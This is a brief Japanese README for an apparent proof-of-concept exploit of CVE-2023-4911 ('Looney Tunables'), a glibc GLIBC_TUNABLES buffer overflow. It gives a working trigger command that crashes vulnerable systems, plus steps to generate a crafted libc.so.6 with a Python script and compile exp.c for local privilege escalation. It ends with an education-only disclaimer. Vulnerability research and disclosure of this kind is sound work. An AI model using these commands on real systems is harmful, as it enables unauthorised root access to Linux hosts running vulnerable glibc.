
CVE-2023-4911(Loony Tunables)の概念実証エクスプロイト。glibcのGLIBC_TUNABLES解析におけるバッファオーバーフローを標的としています。脆弱性の検出と、権限昇格のためのコンパイル済みエクスプロイトを含みます。
これは CVE-2023-4911(別名 "Looney Tunables")の PoC であり、glibc 動的ローダーの環境変数パース関数 parse_tunables() における GLIBC_TUNABLES のバグを利用します。
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped) が出力された場合、脆弱な対象です。libc.so.6 ファイルを作成python3 libc.py
gcc exp.c -o exp
このリポジトリで提供されるすべてのコードは、教育・研究目的のみに使用されます。このリポジトリに含まれる素材に関連するいかなる行動や活動も、すべて利用者の責任となります。このリポジトリのコードの誤用は、該当者に対する刑事告訴につながる可能性があります。作者は、このリポジトリのコードを法律違反のために誤用した個人に対して刑事告訴が行われた場合、一切の責任を負いません。